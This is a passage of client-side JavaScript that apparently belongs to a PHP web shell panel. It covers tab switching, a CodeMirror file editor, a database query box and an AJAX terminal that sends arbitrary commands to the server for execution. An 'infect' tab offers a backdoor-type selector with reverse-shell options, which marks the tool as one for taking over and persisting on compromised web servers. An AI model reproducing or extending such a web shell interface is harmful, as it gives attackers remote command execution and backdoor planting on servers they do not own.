root.style.setProperty('--bg-dark', '#1a1a1a'); root.style.setProperty('--bg-lighter', '#2d2d2d'); root.style.setProperty('--bg-light', '#333'); root.style.setProperty('--text', '#fff'); root.style.setProperty('--text-muted', '#aaa'); root.style.setProperty('--border', '#444'); // Update button appearance themeToggle.innerHTML = '<i class="fas fa-moon" style="font-size:18px;color:#3498db;"></i>'; themeToggle.style.background = '#2d2d2d'; themeToggle.style.boxShadow = '0 2px 10px rgba(0,0,0,0.3)'; localStorage.setItem('theme', 'dark'); } } // Check for saved theme preference or use default (dark) const savedTheme = localStorage.getItem('theme') || 'dark'; setTheme(savedTheme === 'dark'); // Setup form toggles document.getElementById('new-file-btn')?.addEventListener('click', function() { document.getElementById('new-file-form').style.display = 'block'; document.getElementById('new-dir-form').style.display = 'none'; document.getElementById('upload-form').style.display = 'none'; }); document.getElementById('new-dir-btn')?.addEventListener('click', function() { document.getElementById('new-file-form').style.display = 'none'; document.getElementById('new-dir-form').style.display = 'block'; document.getElementById('upload-form').style.display = 'none'; }); document.getElementById('upload-btn')?.addEventListener('click', function() { document.getElementById('new-file-form').style.display = 'none'; document.getElementById('new-dir-form').style.display = 'none'; document.getElementById('upload-form').style.display = 'block'; }); // Command history document.getElementById('cmd-history')?.addEventListener('change', function() { if (this.value) { document.getElementById('cmd-input').value = this.value; this.selectedIndex = 0; } }); // Clear terminal output document.getElementById('clear-output')?.addEventListener('click', function() { const terminal = document.querySelector('.terminal'); if (terminal) terminal.textContent = ''; }); // Tab switching const tabs = document.querySelectorAll('.navbar a'); // Get sections by finding cards with specific icons in their headers const fileManager = document.querySelector('.file-list.card'); // Find all card headers const cardHeaders = document.querySelectorAll('.card-header h3'); let terminalSection = null; let databaseSection = null; let sysInfoSection = null; let networkSection = null; let infectSection = null; // Find sections by their icons in headers cardHeaders.forEach(header => { const headerHTML = header.innerHTML; const parentCard = header.closest('.card'); if (headerHTML.includes('fa-terminal')) { terminalSection = parentCard; } else if (headerHTML.includes('fa-database')) { databaseSection = parentCard; } else if (headerHTML.includes('fa-info-circle')) { sysInfoSection = parentCard; } else if (headerHTML.includes('fa-network-wired')) { networkSection = parentCard; } else if (headerHTML.includes('fa-virus')) { infectSection = parentCard; } }); // Set initial tab state based on URL parameter const currentTab = ' echo $active_tab; '; // Hide all sections initially if (fileManager) fileManager.style.display = 'none'; if (terminalSection) terminalSection.style.display = 'none'; if (databaseSection) databaseSection.style.display = 'none'; if (sysInfoSection) sysInfoSection.style.display = 'none'; if (networkSection) networkSection.style.display = 'none'; if (infectSection) infectSection.style.display = 'none'; // Show the active tab section if (currentTab === 'filemanager' && fileManager) fileManager.style.display = 'block'; if (currentTab === 'terminal' && terminalSection) terminalSection.style.display = 'block'; if (currentTab === 'database' && databaseSection) databaseSection.style.display = 'block'; if (currentTab === 'info' && sysInfoSection) sysInfoSection.style.display = 'block'; if (currentTab === 'network' && networkSection) networkSection.style.display = 'block'; if (currentTab === 'infect' && infectSection) infectSection.style.display = 'block'; tabs.forEach(tab => { tab.addEventListener('click', function(e) { if (this.getAttribute('href') === '?logout=1') return; // Don't handle logout tab // The click event already has an href with the tab parameter, so we don't need to modify it here }); }); // Rename function window.renameItem = function(name) { document.getElementById('rename_from').value = name; document.getElementById('rename_to').value = name; document.getElementById('rename-form').style.display = 'block'; }; // Chmod function window.chmodItem = function(name, perms) { document.getElementById('chmod_file').value = name; document.getElementById('chmod_value').value = perms; document.getElementById('chmod-form').style.display = 'block'; }; // Special event handling for the infect tab const backdoorTypeSelect = document.getElementById('backdoor_type'); if (backdoorTypeSelect) { backdoorTypeSelect.addEventListener('change', function() { const reverseOptions = document.getElementById('reverse_shell_options'); if (this.value === 'reverse_shell') { reverseOptions.style.display = 'block'; } else { reverseOptions.style.display = 'none'; } }); } // Handle subtabs switching in infect, network, and other sections const subtabs = document.querySelectorAll('.tab-container .tab'); subtabs.forEach(tab => { tab.addEventListener('click', function() { // Find parent tab container const container = this.closest('.tab-container'); // Remove active class from all tabs in this container container.querySelectorAll('.tab').forEach(t => { t.classList.remove('active'); }); // Add active class to current tab this.classList.add('active'); // Hide all tab contents in this container container.querySelectorAll('.tab-content').forEach(content => { content.classList.remove('active'); content.style.display = 'none'; }); // Show the selected tab content const tabId = this.getAttribute('data-tab'); const tabContent = container.querySelector('#' + tabId + '-tab'); if (tabContent) { tabContent.classList.add('active'); tabContent.style.display = 'block'; } }); }); // Theme toggle document.getElementById('theme-toggle')?.addEventListener('click', function() { const root = document.documentElement; const isDark = getComputedStyle(root).getPropertyValue('--bg-dark').trim() === '#1a1a1a'; setTheme(!isDark); }); // Auto-focus input when available const cmdInput = document.getElementById('cmd-input'); if (cmdInput) cmdInput.focus(); // Setup CodeMirror editor if we're in edit mode const editorTextarea = document.querySelector('textarea[name="content"]'); if (editorTextarea) { // Determine mode based on file extension let mode = 'text/plain'; const extension = editorTextarea.dataset.extension || ''; switch (extension.toLowerCase()) { case 'php': mode = 'application/x-httpd-php'; break; case 'js': mode = 'text/javascript'; break; case 'css': mode = 'text/css'; break; case 'html': case 'htm': mode = 'text/html'; break; case 'xml': mode = 'application/xml'; break; case 'sql': mode = 'text/x-sql'; break; case 'json': mode = 'application/json'; break; } // Create CodeMirror instance const editor = CodeMirror.fromTextArea(editorTextarea, { lineNumbers: true, matchBrackets: true, indentUnit: 4, mode: mode, theme: 'monokai', autoCloseBrackets: true, autoCloseTags: true, lineWrapping: true }); // Make sure editor fits well editor.setSize('100%', 500); // Make sure form submission includes editor content const form = editorTextarea.closest('form'); if (form) { form.addEventListener('submit', function() { editor.save(); }); } } // Add syntax highlighting to database textarea const sqlTextarea = document.querySelector('textarea[name="db_query"]'); if (sqlTextarea) { const sqlEditor = CodeMirror.fromTextArea(sqlTextarea, { lineNumbers: true, matchBrackets: true, mode: 'text/x-sql', theme: 'monokai', lineWrapping: true }); sqlEditor.setSize('100%', 150); const sqlForm = sqlTextarea.closest('form'); if (sqlForm) { sqlForm.addEventListener('submit', function() { sqlEditor.save(); }); } } }); // Network Tools tab switching const networkTabs = document.querySelectorAll('.tab-container .tabs .tab'); const networkContents = document.querySelectorAll('.tab-container .tab-content'); networkTabs.forEach(tab => { tab.addEventListener('click', function() { // Find the closest tab container to handle multiple tab systems on the page const parentContainer = this.closest('.tab-container'); // Only target tabs in the same container const containerTabs = parentContainer.querySelectorAll('.tab'); const containerContents = parentContainer.querySelectorAll('.tab-content'); // Remove active class from all tabs in this container containerTabs.forEach(t => t.classList.remove('active')); // Add active class to clicked tab this.classList.add('active'); // Hide all content sections in this container containerContents.forEach(content => { content.classList.remove('active'); content.style.display = 'none'; }); // Show the corresponding content const tabId = this.getAttribute('data-tab'); const targetContent = document.getElementById(tabId + '-tab'); if (targetContent) { targetContent.classList.add('active'); targetContent.style.display = 'block'; } }); }); // Make sure the network results are visible if they contain data const networkResults = document.getElementById('network-results'); if (networkResults && networkResults.querySelector('pre').textContent.trim() !== '') { networkResults.style.display = 'block'; } // Initialize editors for textareas const editorTextareas = document.querySelectorAll('textarea[data-extension]'); if (editorTextareas.length > 0) { editorTextareas.forEach(textarea => { const extension = textarea.getAttribute('data-extension'); let mode = 'text'; // Determine mode based on file extension switch (extension) { case 'js': mode = 'javascript'; break; case 'php': mode = 'php'; break; case 'html': case 'htm': mode = 'htmlmixed'; break; case 'css': mode = 'css'; break; case 'xml': mode = 'xml'; break; case 'sql': mode = 'sql'; break; // Add more modes as needed } // Initialize CodeMirror const editor = CodeMirror.fromTextArea(textarea, { lineNumbers: true, mode: mode, theme: 'monokai', matchBrackets: true, indentUnit: 4, indentWithTabs: false, lineWrapping: true }); // Set height editor.setSize(null, 350); }); } // Enhanced Terminal Functionality const cmdInput = document.getElementById('cmd-input'); if (cmdInput) { const terminalForm = document.getElementById('terminal-form'); const terminalOutput = document.getElementById('terminal-output'); const autocompleteBox = document.getElementById('autocomplete-box'); const commonCmdsBtn = document.getElementById('common-cmds-btn'); const commonCmdsPopup = document.getElementById('common-cmds-popup'); const helpBtn = document.getElementById('help-btn'); const helpDialog = document.getElementById('help-dialog'); const closeHelpBtn = document.getElementById('close-help'); // Command history management let cmdHistory = []; let historyCursor = -1; let currentInput = ''; // Initialize with session history if available if (window.sessionStorage.getItem('cmd_history')) { try { cmdHistory = JSON.parse(window.sessionStorage.getItem('cmd_history')); } catch (e) { cmdHistory = []; } } // Basic commands for autocomplete const commonCommands = [ 'ls', 'cd', 'pwd', 'grep', 'find', 'cat', 'echo', 'touch', 'mkdir', 'rm', 'cp', 'mv', 'chmod', 'chown', 'man', 'ps', 'kill', 'whoami', 'history', 'clear', 'uname', 'ip', 'netstat', 'ifconfig', 'ping', 'wget', 'curl', 'tar', 'gzip', 'ssh', 'scp', 'mysql', 'systemctl', 'df', 'du', 'top', 'htop', 'free', 'env', 'export', 'dpkg', 'apt', 'yum', 'python', 'php', 'node', 'npm', 'git', 'docker', 'crontab' ]; // Common flags for commands const commonFlags = { 'ls': ['-l', '-a', '-h', '-la', '-lt', '-ltr', '-R'], 'grep': ['-r', '-i', '-v', '-n', '-E', '-w', '-c'], 'find': ['-name', '-type', '-size', '-exec', '-mtime', '-user', '-group'], 'ps': ['aux', '-ef', '-l', '--sort=-%cpu'], 'netstat': ['-tulpn', '-an', '-r'], 'chmod': ['-R', '+x', '-x', '777', '755', '644'], 'tar': ['-czvf', '-xzvf', '-cjvf', '-xjvf'], 'git': ['clone', 'pull', 'push', 'commit', 'checkout', 'branch', 'status'] }; // Syntax highlighting function function highlightSyntax(cmd) { if (!cmd) return ''; // Break command into parts const parts = cmd.split(' '); if (parts.length === 0) return ''; // Highlight first part as command/keyword let highlighted = `<span class="cmd-keyword">${parts[0]}</span>`; for (let i = 1; i < parts.length; i++) { const part = parts[i]; if (part.startsWith('"') && part.endsWith('"') || part.startsWith("'") && part.endsWith("'")) { // String highlighted += ` <span class="cmd-string">${part}</span>`; } else if (part.startsWith('#')) { // Comment - include rest of command highlighted += ` <span class="cmd-comment">${parts.slice(i).join(' ')}</span>`; break; } else if (part.startsWith('-') || part.startsWith('--')) { // Flag highlighted += ` <span class="cmd-flag">${part}</span>`; } else if (part.startsWith('$') || part.startsWith('${')) { // Variable highlighted += ` <span class="cmd-variable">${part}</span>`; } else if (part.includes('/') || part.endsWith('.php') || part.endsWith('.html') || part.endsWith('.js') || part.endsWith('.txt') || part.endsWith('.css')) { // Path or file highlighted += ` <span class="cmd-path">${part}</span>`; } else { // Regular text highlighted += ` ${part}`; } } return highlighted; } // AJAX terminal execution function executeCommand(cmd) { if (!cmd.trim()) return; // Check for special commands if (cmd === 'clear') { terminalOutput.innerHTML = ''; return; } // Add to history if not duplicate of last command if (cmdHistory.length === 0 || cmdHistory[cmdHistory.length - 1] !== cmd) { cmdHistory.push(cmd); if (cmdHistory.length > 50) cmdHistory.shift(); window.sessionStorage.setItem('cmd_history', JSON.stringify(cmdHistory)); historyCursor = cmdHistory.length; } // Show command in terminal with highlighting terminalOutput.innerHTML += `<div style="color:#3498db;margin-top:5px;">$ ${highlightSyntax(cmd)}</div>`; // Add loading indicator const loadingDiv = document.createElement('div'); loadingDiv.className = 'loading'; loadingDiv.textContent = 'Executing'; terminalOutput.appendChild(loadingDiv); // Scroll to bottom terminalOutput.scrollTop = terminalOutput.scrollHeight; // Create form data for AJAX request const formData = new FormData(); formData.append('cmd', cmd); formData.append('token', document.querySelector('input[name="token"]').value); formData.append('tab', document.querySelector('input[name="tab"]').value); // Add X-Requested-With header for AJAX detection const fetchOptions = { method: 'POST', body: formData, headers: { 'X-Requested-With': 'XMLHttpRequest' } }; // Send AJAX request fetch(window.location.pathname, fetchOptions) .then(response => response.text()) .then(output => { // Remove loading indicator terminalOutput.removeChild(loadingDiv); if (output.trim()) { terminalOutput.innerHTML += `<pre style="margin-top:2px;margin-bottom:8px;">${output}</pre>`; } else { terminalOutput.innerHTML += `<div style="color:#ccc;margin-top:2px;margin-bottom:8px;"><i>Command executed with no output</i></div>`; } // Update history dropdown const historySelect = document.getElementById('cmd-history'); if (historySelect) { // Clear existing options except the first one while (historySelect.options.length > 1) { historySelect.remove(1); } // Add updated history cmdHistory.forEach(histCmd => { const option = document.createElement('option'); option.value = histCmd; option.text = histCmd; historySelect.add(option); }); } // Scroll to bottom terminalOutput.scrollTop = terminalOutput.scrollHeight; }) .catch(error => { // Remove loading indicator terminalOutput.removeChild(loadingDiv); // Show error terminalOutput.innerHTML += `<div style="color:#e74c3c;margin-top:2px;margin-bottom:8px;">Error: ${error.message}</div>`; // Scroll to bottom terminalOutput.scrollTop = terminalOutput.scrollHeight; }); } // Handle form submission if (terminalForm) { terminalForm.addEventListener('submit', function(e) { e.preventDefault(); const cmd = cmdInput.value.trim(); executeCommand(cmd); cmdInput.value = ''; return false; }); } // Close the autocomplete box function closeAutocomplete() { if (autocompleteBox) { autocompleteBox.style.display = 'none'; autocompleteBox.innerHTML = ''; } } // Calculate autocomplete suggestions function showAutocomplete() { if (!autocompleteBox) return; const input = cmdInput.value; const inputParts = input.split(' '); const lastPart = inputParts[inputParts.length - 1]; // Don't show autocomplete if input is empty if (!input.trim()) { closeAutocomplete(); return; } // Different autocomplete based on position in command let suggestions = []; if (inputParts.length === 1) { // First part - command name suggestions = commonCommands.filter(cmd => cmd.startsWith(input.toLowerCase())); } else { const command = inputParts[0].toLowerCase(); // Check for flags if command is recognized if (commonFlags[command] && lastPart.startsWith('-')) { suggestions = commonFlags[command].filter(flag => flag.startsWith(lastPart)); } // Add command history for context-based suggestions const historySuggestions = cmdHistory .filter(cmd => cmd.startsWith(inputParts.join(' '))) .map(cmd => cmd.substring(input.length)); suggestions = [...suggestions, ...historySuggestions]; } // Remove duplicates and limit to 10 suggestions suggestions = [...new Set(suggestions)].slice(0, 10); if (suggestions.length > 0) { autocompleteBox.innerHTML = ''; suggestions.forEach(suggestion => { const div = document.createElement('div'); if (inputParts.length === 1) { div.textContent = suggestion; div.dataset.value = suggestion; } else { div.textContent = suggestion; // For commands with multiple parts, only replace the last part const newValue = [...inputParts.slice(0, -1), suggestion].join(' '); div.dataset.value = newValue; } div.addEventListener('click', function() { cmdInput.value = this.dataset.value; closeAutocomplete(); cmdInput.focus(); }); autocompleteBox.appendChild(div); }); autocompleteBox.style.display = 'block'; } else { closeAutocomplete(); } } // Set up autocomplete triggers if (autocompleteBox) { cmdInput.addEventListener('input', showAutocomplete); cmdInput.addEventListener('focus', showAutocomplete); cmdInput.addEventListener('blur', function() { // Small delay to allow clicking on suggestions setTimeout(closeAutocomplete, 200); }); } // Keyboard navigation for autocomplete let selectedSuggestionIndex = -1; cmdInput.addEventListener('keydown', function(e) { if (autocompleteBox) { const suggestions = autocompleteBox.querySelectorAll('div'); if (autocompleteBox.style.display === 'block' && suggestions.length > 0) { if (e.key === 'ArrowDown') { e.preventDefault(); selectedSuggestionIndex = (selectedSuggestionIndex + 1) % suggestions.length; updateSelectedSuggestion(suggestions); } else if (e.key === 'ArrowUp') { e.preventDefault(); selectedSuggestionIndex = (selectedSuggestionIndex - 1 + suggestions.length) % suggestions.length; updateSelectedSuggestion(suggestions); } else if (e.key === 'Tab' || e.key === 'Enter' && selectedSuggestionIndex > -1) { e.preventDefault(); if (selectedSuggestionIndex > -1) { cmdInput.value = suggestions[selectedSuggestionIndex].dataset.value; } else if (suggestions.length > 0) { cmdInput.value = suggestions[0].dataset.value; } closeAutocomplete(); } else if (e.key === 'Escape') { closeAutocomplete(); } } else if (e.key === 'Tab') { e.preventDefault(); showAutocomplete(); } } // Command history navigation if (e.key === 'ArrowUp') { if (autocompleteBox && autocompleteBox.style.display === 'block') return; e.preventDefault(); if (historyCursor === cmdHistory.length) { currentInput = cmdInput.value; } if (historyCursor > 0) { historyCursor--; cmdInput.value = cmdHistory[historyCursor]; } } else if (e.key === 'ArrowDown') { if (autocompleteBox && autocompleteBox.style.display === 'block') return; e.preventDefault(); if (historyCursor < cmdHistory.length - 1) { historyCursor++; cmdInput.value = cmdHistory[historyCursor]; } else if (historyCursor === cmdHistory.length - 1) { historyCursor = cmdHistory.length; cmdInput.value = currentInput; } } else if (e.ctrlKey && e.key === 'l') { e.preventDefault(); if (terminalOutput) terminalOutput.innerHTML = ''; } else if (e.ctrlKey && e.key === 'u') { e.preventDefault(); cmdInput.value = ''; } }); function updateSelectedSuggestion(suggestions) { suggestions.forEach((suggestion, index) => { if (index === selectedSuggestionIndex) { suggestion.classList.add('selected'); } else { suggestion.classList.remove('selected'); } }); } // Common commands popup if (commonCmdsBtn && commonCmdsPopup) { commonCmdsBtn.addEventListener('click', function() { const btnRect = commonCmdsBtn.getBoundingClientRect(); commonCmdsPopup.style.top = (btnRect.bottom + 5) + 'px'; commonCmdsPopup.style.right = (window.innerWidth - btnRect.right) + 'px'; commonCmdsPopup.style.display = commonCmdsPopup.style.display === 'none' ? 'block' : 'none'; }); // Handle selection of a command from the popup const cmdItems = commonCmdsPopup.querySelectorAll('.cmd-item'); cmdItems.forEach(item => { item.addEventListener('click', function() { const cmd = this.dataset.cmd; cmdInput.value = cmd; commonCmdsPopup.style.display = 'none'; cmdInput.focus(); }); }); // Close popup when clicking outside document.addEventListener('click', function(e) { if (e.target !== commonCmdsBtn && !commonCmdsPopup.contains(e.target)) { commonCmdsPopup.style.display = 'none'; } }); } // Help dialog if (helpBtn && helpDialog && closeHelpBtn) { helpBtn.addEventListener('click', function() { helpDialog.style.display = 'block'; }); closeHelpBtn.addEventListener('click', function() { helpDialog.style.display = 'none'; }); // Close on click outside the dialog content helpDialog.addEventListener('click', function(e) { if (e.target === helpDialog) { helpDialog.style.display = 'none'; } }); // Close on escape key document.addEventListener('keydown', function(e) { if (e.key === 'Escape' && helpDialog.style.display === 'block') { helpDialog.style.display = 'none'; } }); } // Make terminal output focusable for keyboard navigation if (terminalOutput) terminalOutput.tabIndex = 0; } // Function to initialize all tab containers function initializeAllTabContainers() { // Get all tab containers const tabContainers = document.querySelectorAll('.tab-container'); // For each container, initialize tab switching tabContainers.forEach(container => { const tabs = container.querySelectorAll('.tab'); const contents = container.querySelectorAll('.tab-content'); // Set initial state - make sure one tab is active let hasActive = false; tabs.forEach(tab => { if (tab.classList.contains('active')) { hasActive = true; const tabId = tab.getAttribute('data-tab'); const targetContent = document.getElementById(tabId + '-tab'); if (targetContent) { targetContent.classList.add('active'); targetContent.style.display = 'block'; } } }); // If no active tab, activate first tab if (!hasActive && tabs.length > 0) { tabs[0].classList.add('active'); const tabId = tabs[0].getAttribute('data-tab'); const targetContent = document.getElementById(tabId + '-tab'); if (targetContent) { targetContent.classList.add('active'); targetContent.style.display = 'block'; } } // Add click handlers tabs.forEach(tab => { tab.addEventListener('click', function() { // Remove active class from all tabs tabs.forEach(t => t.classList.remove('active')); // Add active class to clicked tab this.classList.add('active'); // Hide all content sections contents.forEach(content => { content.classList.remove('active'); content.style.display = 'none'; }); // Show the corresponding content const tabId = this.getAttribute('data-tab'); const targetContent = document.getElementById(tabId + '-tab'); if (targetContent) { targetContent.classList.add('active'); targetContent.style.display = 'block'; } }); }); }); } </script>